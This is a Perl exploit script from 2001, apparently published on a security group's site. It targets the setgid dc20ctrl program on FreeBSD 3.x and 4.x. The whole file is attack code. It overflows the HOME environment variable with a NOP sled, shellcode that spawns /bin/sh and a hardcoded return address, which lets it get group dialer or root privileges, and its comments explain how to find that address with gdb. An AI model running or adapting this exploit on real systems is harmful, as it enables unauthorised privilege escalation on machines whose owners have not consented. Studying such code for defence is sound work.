#!/usr/bin/perl
# FreeBSD 3.x/4.X dc20ctrl local exploit
# should yield gid(dialer) or gid(root) on non-fbsd systems.
#
# vulnerability lies in session.c in getenv(), other bugs 
# exist, such as the -P with 344 byte arg, overwriting %ecx.
# To get $ret do: export HOME=`perl -e 'print "A"x520'`; dc20ctrl;
# gdb dc20ctrl -c dc20ctrl.core ; in gdb type: info reg $esp
# 
# code by dethy -  Feb 10 2001.
# dethy@synnergy.net / www.synnergy.net
#
 $shellcode =   "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76".
                "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b".
                "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff".
                "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff".
                "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02".
                "\x02\x02\x02/bin/sh.-c.sh";

 $ret = 0xbfbff79c;                     # FreeBSD 4.2
 $buf = 520;
 $egg = 1000;
 $nop = "\x90";

 print "\nFreeBSD dc20ctrl local exploit by dethy\n\n";
 foreach $key (keys %ENV) {
  delete $ENV{$key};                    # avoid offset guessing
 }      
 $addr = pack('l', $ret);
 for ($i = 0; $i < $buf; $i += 4) { $buffer .= $addr; }
 for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) { 
 $buffer .= $nop; 
 }
 $buffer .= $shellcode;
 $ENV{'HOME'} = $buffer;
 exec("./usr/local/bin/dc20ctrl", 0);